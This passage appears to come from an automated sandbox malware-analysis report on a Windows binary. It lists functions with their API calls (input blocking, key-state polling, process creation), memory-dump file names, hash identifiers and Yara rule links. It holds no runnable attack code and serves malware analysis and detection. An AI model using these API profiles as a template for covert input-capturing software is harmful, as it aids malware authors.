                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2065330234-0
                                                                                                                                                                  • Opcode ID: 0ba506b18c207fe9ca5c79550d79b3bc3fe219824ac73a60e592d2b9764ba181
                                                                                                                                                                  • Instruction ID: 71f061a4f641ffad983f086d262820227d32434d976b6d9d2a491fb8c40d2978
                                                                                                                                                                  • Opcode Fuzzy Hash: 0ba506b18c207fe9ca5c79550d79b3bc3fe219824ac73a60e592d2b9764ba181
                                                                                                                                                                  • Instruction Fuzzy Hash: 59E08C3020425DBBEB180F0AEC0EFB93B28EB40B50F50C526F917890E0D7F098A0D660
                                                                                                                                                                  Function 00208E3C Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,001E125D,00207A43,001E0F35,?,?,00000001), ref: 00208E41
                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00208E4A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                  • Opcode ID: 8ddf41f8dd851f25b5c0e53788fbbb491647aaaa3d02bf15221f170970fd8562
                                                                                                                                                                  • Instruction ID: 7f832f8e89b5bc5032c1bbbecdb505db088d3a063bdd70e5d64b2d7bdf16cbf5
                                                                                                                                                                  • Opcode Fuzzy Hash: 8ddf41f8dd851f25b5c0e53788fbbb491647aaaa3d02bf15221f170970fd8562
                                                                                                                                                                  • Instruction Fuzzy Hash: BAB09271644A0CABEA002BA1FC0DB883F68EB08A62F008090F61D442608BA354608E9A
                                                                                                                                                                  Function 0021113E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: da9ace6fa4a35c0e2684c28a764455680d97a912b774d24d4c867f6c3a0abf25
                                                                                                                                                                  • Instruction ID: 2e4fcb9945fce46e288a290f6e26c12aeaa800beac62c13bdd40d07380db9cf4
                                                                                                                                                                  • Opcode Fuzzy Hash: da9ace6fa4a35c0e2684c28a764455680d97a912b774d24d4c867f6c3a0abf25
                                                                                                                                                                  • Instruction Fuzzy Hash: 4AB1EF20D2AF514DD62396399835336F69CAFBB2C5F91D71BFC2A70D22EB2285D34180
                                                                                                                                                                  Function 002502AA Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 001FAF8E
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 00250352
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2065330234-0
                                                                                                                                                                  • Opcode ID: bacf885b4366aa16843c8c6636023c1f405273c2dd56fb793b2335afc25b2c1a
                                                                                                                                                                  • Instruction ID: 74a3154a596dd23845cdfa459201305de365985280c1a31c70dd63bfaf821dbf
                                                                                                                                                                  • Opcode Fuzzy Hash: bacf885b4366aa16843c8c6636023c1f405273c2dd56fb793b2335afc25b2c1a
                                                                                                                                                                  • Instruction Fuzzy Hash: 3F11043126425ABBFB281F28CC89FBD3A14AB45B21F244355FD119A1E2CAB48D24D269
                                                                                                                                                                  Function 0024E769 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FB155: GetWindowLongW.USER32(?,000000EB), ref: 001FB166
                                                                                                                                                                  • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 0024E7AF
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$CallLongProc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4084987330-0
                                                                                                                                                                  • Opcode ID: bc4be57c83300c21f1822d0ef71ee931a8853bb8f8d30730acf24251c0548485
                                                                                                                                                                  • Instruction ID: fc35ca45d4f8e4702be77b510c60ad787ef19cd4afe0376a5eb73fee26f9b386
                                                                                                                                                                  • Opcode Fuzzy Hash: bc4be57c83300c21f1822d0ef71ee931a8853bb8f8d30730acf24251c0548485
                                                                                                                                                                  • Instruction Fuzzy Hash: 92F04F3521410CEFDF099F54EC44C797BA6FB08370B058514FA168A6B1CB729D70EB50
                                                                                                                                                                  Function 0024EA4E Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 001FAF8E
                                                                                                                                                                    • Part of subcall function 001FB736: GetCursorPos.USER32(000000FF), ref: 001FB749
                                                                                                                                                                    • Part of subcall function 001FB736: ScreenToClient.USER32(00000000,000000FF), ref: 001FB766
                                                                                                                                                                    • Part of subcall function 001FB736: GetAsyncKeyState.USER32(00000001), ref: 001FB78B
                                                                                                                                                                    • Part of subcall function 001FB736: GetAsyncKeyState.USER32(00000002), ref: 001FB799
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,0025F417,?,?,?,?,?,00000001,?), ref: 0024EA9C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2356834413-0
                                                                                                                                                                  • Opcode ID: 8eae3c9c21c6c301c8747272a6b959d7c0f533e9cb25eb17bbfc33b43044c354
                                                                                                                                                                  • Instruction ID: 3c5b25b821917fcc706277a29e40eea39957dd4a28b3cdbefc8f34147f8e01f9
                                                                                                                                                                  • Opcode Fuzzy Hash: 8eae3c9c21c6c301c8747272a6b959d7c0f533e9cb25eb17bbfc33b43044c354
                                                                                                                                                                  • Instruction Fuzzy Hash: E4F0A77520022DABEF14AF15DC0AEBE3F61FF01750F044015F9061A1A1D7B69871DBD1
                                                                                                                                                                  Function 001FB7F2 Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 001FAF8E
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,001FAF40,?,?,?,?,?), ref: 001FB83B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2065330234-0
                                                                                                                                                                  • Opcode ID: 591010cc81983b1480aab59c9ec26ab28d51611c30ed112f4daf1a3cd71a4f41
                                                                                                                                                                  • Instruction ID: c373cf33ec528130df5b43d7d813dd57357f7080622a99bb17e616437d9258a7
                                                                                                                                                                  • Opcode Fuzzy Hash: 591010cc81983b1480aab59c9ec26ab28d51611c30ed112f4daf1a3cd71a4f41
                                                                                                                                                                  • Instruction Fuzzy Hash: 0FF05E34600219DFEB189F14E8949393BA6FB463B0F108229FA524B2A0DB75D860DB50
                                                                                                                                                                  Function 0023703C Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • BlockInput.USER32(00000001), ref: 00237057
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BlockInput
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3456056419-0
                                                                                                                                                                  • Opcode ID: 59371501541638b27bdc61dc08b54c21e2f32de312d4ad8dd0a92de0c41802e7
                                                                                                                                                                  • Instruction ID: 98e789f627ba8b7510b34eb21e6238fec7aab107e668e6aed654618a3682ce9e
                                                                                                                                                                  • Opcode Fuzzy Hash: 59371501541638b27bdc61dc08b54c21e2f32de312d4ad8dd0a92de0c41802e7
                                                                                                                                                                  • Instruction Fuzzy Hash: B6E048753142045FC710DFA9D808D96F7DCAF54760F00C42AFA45D7251DAF0E8148B90
                                                                                                                                                                  Function 0024F3DA Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 0024F41A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DialogNtdllProc_
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3239928679-0
                                                                                                                                                                  • Opcode ID: ec772bc268d86980fcdf19ace392dfd000b9099bd95e5f45093dc6d83e5026d9
                                                                                                                                                                  • Instruction ID: dc62f734742796fbd52f82651e27873a936fcbf40079d3ecac464acf99b8b506
                                                                                                                                                                  • Opcode Fuzzy Hash: ec772bc268d86980fcdf19ace392dfd000b9099bd95e5f45093dc6d83e5026d9
                                                                                                                                                                  • Instruction Fuzzy Hash: CFF06D35250289AFDB25DF58DC49FC63B95FB06760F148419FA11672E1CF706830DB64
                                                                                                                                                                  Function 001FAC99 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 001FAF8E
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 001FACC7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2065330234-0
                                                                                                                                                                  • Opcode ID: 6dbb77157b6bcba9c4ded6c8ba6713246f339897f40ba5cd78fc8b93f74e8014
                                                                                                                                                                  • Instruction ID: f0253220b0772c302ced6642c9138d6501995361b528e96022dbc29bc7eadbd0
                                                                                                                                                                  • Opcode Fuzzy Hash: 6dbb77157b6bcba9c4ded6c8ba6713246f339897f40ba5cd78fc8b93f74e8014
                                                                                                                                                                  • Instruction Fuzzy Hash: 7DE08C39200208FBCF04AF90DC15E283B26FF49350F508018F60A4A2A1CB36A422EB40
                                                                                                                                                                  Function 0024F425 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,0025F3D4,?,?,?,?,?,?), ref: 0024F450
                                                                                                                                                                    • Part of subcall function 0024E13E: _memset.LIBCMT ref: 0024E14D
                                                                                                                                                                    • Part of subcall function 0024E13E: _memset.LIBCMT ref: 0024E15C
                                                                                                                                                                    • Part of subcall function 0024E13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,002A3EE0,002A3F24), ref: 0024E18B
                                                                                                                                                                    • Part of subcall function 0024E13E: CloseHandle.KERNEL32 ref: 0024E19D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2364484715-0
                                                                                                                                                                  • Opcode ID: 8e6a5e81d4628836646311c378a0853efa5e5ba8adfc143e21dfbb7480efe015
                                                                                                                                                                  • Instruction ID: 2b5106850be412924d4f2ba1b2dee4efdfe48ddfe7a4610ad355ff2782a2b718
                                                                                                                                                                  • Opcode Fuzzy Hash: 8e6a5e81d4628836646311c378a0853efa5e5ba8adfc143e21dfbb7480efe015
                                                                                                                                                                  • Instruction Fuzzy Hash: 0FE01235220209DFDB45AF08ED48E9637A2FB08350F018011FA05572B1CB71A830EF40
                                                                                                                                                                  Function 0024F37C Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL ref: 0024F3A1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DialogNtdllProc_
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3239928679-0
                                                                                                                                                                  • Opcode ID: 8a52324c2dd3bb5ffd8bd27b2a76b663783d66087f8d0f879606e3fd74110256
                                                                                                                                                                  • Instruction ID: 8bcbc014548ec45f1d08ec46532876f249462d6fa7430bea45ebccc6c7591922
                                                                                                                                                                  • Opcode Fuzzy Hash: 8a52324c2dd3bb5ffd8bd27b2a76b663783d66087f8d0f879606e3fd74110256
                                                                                                                                                                  • Instruction Fuzzy Hash: A0E0E23820424CEFDB01DF88E848E863BA5FB1A350F004054FD058B261CB71A830DB61
                                                                                                                                                                  Function 0024F3AB Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL ref: 0024F3D0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DialogNtdllProc_
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3239928679-0
                                                                                                                                                                  • Opcode ID: 491d5aad34990a370022e2a0aca2234a54884afbc4d7113460b39d4f5307a432
                                                                                                                                                                  • Instruction ID: fcec69e11e4ff89ff14d88c1f8ed7b10ced001e91835a0dcdb3ac450218ba42a
                                                                                                                                                                  • Opcode Fuzzy Hash: 491d5aad34990a370022e2a0aca2234a54884afbc4d7113460b39d4f5307a432
                                                                                                                                                                  • Instruction Fuzzy Hash: A8E0173820024CEFDB01DF88E848E863BA5FB1A350F004054FD058B372CB72A830EBA1
                                                                                                                                                                  Function 001FB845 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 001FAF8E
